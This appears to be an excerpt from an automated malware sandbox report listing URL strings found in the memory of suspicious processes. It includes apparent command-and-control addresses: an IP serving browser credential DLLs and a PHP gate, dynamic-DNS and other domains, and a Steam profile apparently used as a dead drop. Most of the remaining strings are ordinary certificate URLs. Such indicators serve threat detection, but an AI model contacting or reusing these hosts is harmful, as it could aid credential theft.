                            Source: RegAsm.exe, 00000013.00000002.2783474686.000000000147A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2779012779.00000000005CB000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dllt
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dllpAc
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014BD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2783474686.00000000014A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dllppData
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll6A
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll5$
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2783474686.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2779012779.00000000005CB000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php&P
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpb
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpe
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpnu
                            Source: RegAsm.exe, 00000013.00000002.2779012779.00000000005CB000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phpry=----BKKFHIEGDHJKECAAKKEBefault-release
                            Source: RegAsm.exe, 00000013.00000002.2812494154.00000000279D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/c4754d4f680ead72.phptk
                            Source: RegAsm.exe, 00000013.00000002.2783474686.00000000014BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109/c4754d4f680ead72.php~
                            Source: RegAsm.exe, 00000013.00000002.2779012779.00000000005CB000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://46.8.231.109CGIIDGD-data;
                            Source: RegAsm.exe, 00000006.00000002.2328296570.0000000004037000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                            Source: LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000003.00000002.4578530744.0000000002B7A000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000007.00000002.2292535537.00000000030D6000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000012.00000002.2377496646.0000000003035000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000017.00000002.2457008561.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000027B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003199000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000027B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                            Source: GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgH
                            Source: LKMService.exe, 00000002.00000002.4578665236.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003671000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgd
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, softokn3[1].dll.19.dr, userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                            Source: userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, softokn3[1].dll.19.dr, userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, softokn3[1].dll.19.dr, userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.BFBAKFHJDBKJ
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.HJDBKJ
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org
                            Source: RegAsm.exe, 00000023.00000002.3012453273.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.00000000012C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.orgBKJ
                            Source: E4aR4O9hOTF5WJfvKNpcVCp8.exe, 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                            Source: RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hoptoFHJDBKJ
                            Source: userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                            Source: RegAsm.exe, 00000006.00000002.2328296570.0000000004037000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                            Source: RegAsm.exe, 00000006.00000002.2327479029.0000000003EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftD
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, softokn3[1].dll.19.dr, userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                            Source: userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, softokn3[1].dll.19.dr, userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                            Source: userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                            Source: userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, softokn3[1].dll.19.dr, userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://ocsp.digicert.com0
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, softokn3[1].dll.19.dr, userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://ocsp.digicert.com0A
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, softokn3[1].dll.19.dr, userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://ocsp.digicert.com0C
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.19.dr, nss3.dll.19.drString found in binary or memory: http://ocsp.digicert.com0N
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, softokn3[1].dll.19.dr, userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://ocsp.digicert.com0X
                            Source: userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: http://ocsp.entrust.net02
                            Source: RegAsm.exe, 00000006.00000002.2328296570.0000000004037000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: http://ocsp.entrust.net03
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003199000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000027B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2589625219.0000000001356000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2589625219.0000000001356000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000027.00000002.2589625219.0000000001356000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002B.00000002.3002399614.0000000001406000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                            Source: RegAsm.exe, 00000023.00000002.3060192324.0000000022F54000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3104338698.0000000040C89000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3086066708.0000000034DAE000.00000004.00000020.00020000.00000000.sdmp, userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, softokn3[1].dll.19.dr, userJEHDHIEGII.exe.19.dr, nss3.dll.19.drString found in binary or memory: http://www.digicert.com/CPS0
                            Source: userCGHCGIIDGD.exe.19.dr, 66fbfcc9963ca_ldfsna[1].exe.35.dr, userJEHDHIEGII.exe.19.drString found in binary or memory: http://www.entrust.net/rpa03
                            Source: RegAsm.exe, RegAsm.exe, 00000013.00000002.2847784623.000000006BE5D000.00000002.00000001.01000000.00000011.sdmp, RegAsm.exe, 00000023.00000002.3066218215.0000000028ECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                            Source: RegAsm.exe, 00000013.00000002.2802740473.000000001B957000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2832453194.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3059652013.0000000022A1D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3032719149.000000001CA78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.2984201099.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.20.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                            Source: f98ae5e6665140c7bc7a10ef5c598fcb.exe, 00000004.00000002.2206542664.0000000003B55000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003323000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003671000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003631000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yalubluseks.eu
                            Source: LKMService.exe, 00000002.00000002.4578665236.0000000003323000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003671000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.0000000003631000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4578665236.000000000335F000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, GoogleUpdater.exe, 00000028.00000002.4580817011.00000000028FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yalubluseks.eud
                            Source: 76561199780418869[1].htm.20.drString found in binary or memory: https://49.12.197.9
                            Source: RegAsm.exe, 00000014.00000002.3179432809.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3443973307.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9.0.5938.134
                            Source: RegAsm.exe, 00000014.00000002.3190699075.0000000001680000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.000000000156F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.0000000001551000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/
                            Source: RegAsm.exe, 0000002F.00000002.3450965793.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/I
